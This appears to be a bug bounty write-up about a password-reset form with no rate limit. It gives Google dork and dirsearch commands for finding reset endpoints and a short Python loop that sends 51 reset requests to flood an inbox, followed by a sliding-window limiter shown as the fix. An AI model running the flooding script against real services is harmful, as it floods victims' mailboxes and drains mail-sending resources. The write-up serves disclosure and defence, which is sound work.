Easy Bug: No Rate Limiting on Form which Triggers Emails
Overview of the Vulnerability:
Rate limiting prevents an application from becoming unresponsive or unavailable because too many requests exhaust its resources. No limit was identified on the rate at which the forgot-password endpoint could be called. This allows an attacker to trigger a large number of emails to any email address, which can be used to flood a target's inbox.
Steps:
1. Search for potential endpoints:
Use Google dorks to identify potential password reset endpoints. For example, use the search query:
[ site:*.Redacted.com intitle:"Reset Password" | "Forget Password" ]
Endpoints can also be found in many other ways, e.g. by fuzzing:
dirsearch -u https://[Redacted].com/ --max-rate=5 -w ~/ur_wordlist.txt
2. Capture the request via Burp Suite or OWASP ZAP.
Fill out the form that triggers an email, using an email address that you own as the destination. For example, use free@Palestine.com.
Then send the request and inspect the response (the response itself may already indicate whether a rate limit is applied).
3. Use Burp Suite or OWASP ZAP to send more than 50 requests for the email address you own in less than 10 seconds.
I created Python code that helps me do this another way:
import requests

url = "https://captest.[Redacted].com/Account/RequestPassword"

# Content-Length is computed by requests from the encoded body, so it is not set by hand;
# a hard-coded value would be wrong as soon as the form data changed.
headers = {
    "Host": "captest.[Redacted].com",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
}

# Form field holding the address that receives the reset email (an address you own)
data = {
    "UserName": "free@Palestine.com",
}

# Send 51 requests back to back (more than 50, as in step 3) and print each status code
for _ in range(51):
    response = requests.post(url, headers=headers, data=data)
    print(f"Response status code: {response.status_code}")
Impact:
- Mailbox overflow for the targeted address
- Depletion of the application's mail-sending resources
- Causing inconvenience to users
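The fix is to limit the endpoint on both dimensions the bug abuses: how often one destination address can be sent a reset mail, and how many reset requests one client can make. The following is an added example, not code from the original write-up or the affected application: a sliding-window limiter applied in a hypothetical handler for the reset form, then replayed against the write-up's scenario of 51 requests in under 10 seconds. The limits (3 mails per address and 10 requests per IP per 10 minutes), the handler name and the client IP are constructed for the example.

```python
import time
from collections import defaultdict, deque

# Constructed policy values for this example (hypothetical, not from the original post)
MAX_PER_EMAIL = 3       # reset emails allowed per destination address per window
MAX_PER_IP = 10         # reset requests allowed per client IP per window
WINDOW_SECONDS = 600    # 10-minute sliding window


class SlidingWindowLimiter:
    """Sliding-window counter: stores the timestamps of accepted requests per key
    and discards those that fell out of the window before counting."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.events = defaultdict(deque)

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.events[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def handle_request_password(email, client_ip, email_limiter, ip_limiter, outbox, now=None):
    """Hypothetical handler for the reset form. Both limits must pass before a mail is
    queued. The response is identical in every case, so neither the existence of the
    account nor the state of the limiter leaks to the caller."""
    # normalise so "Free@Palestine.com " and "free@palestine.com" share one quota
    recipient = email.strip().lower()
    if ip_limiter.allow(client_ip, now) and email_limiter.allow(recipient, now):
        outbox.append((recipient, now))       # stand-in for enqueueing the real email
    # rejected requests are dropped silently here; log them server-side for monitoring
    return {"status": 200, "message": "If an account exists for that address, a reset email has been sent."}


def simulate_burst(n=51, email="free@Palestine.com", client_ip="203.0.113.5"):
    """Replay the write-up's scenario: n requests for one address, one every 100 ms.
    Returns the number of emails that would actually be sent."""
    email_limiter = SlidingWindowLimiter(MAX_PER_EMAIL, WINDOW_SECONDS)
    ip_limiter = SlidingWindowLimiter(MAX_PER_IP, WINDOW_SECONDS)
    outbox = []
    for i in range(n):
        handle_request_password(email, client_ip, email_limiter, ip_limiter, outbox, now=i * 0.1)
    return len(outbox)


if __name__ == "__main__":
    print(f"emails actually sent for 51 requests: {simulate_burst()}")  # 3
```

The in-memory deques are enough to show the logic; a real deployment keeps the counters in shared storage (a Redis key per address and per IP, for instance) so that every application instance enforces the same window, and the per-address limit is the one that matters most, because the attacker controls the source IPs but not the victim's address.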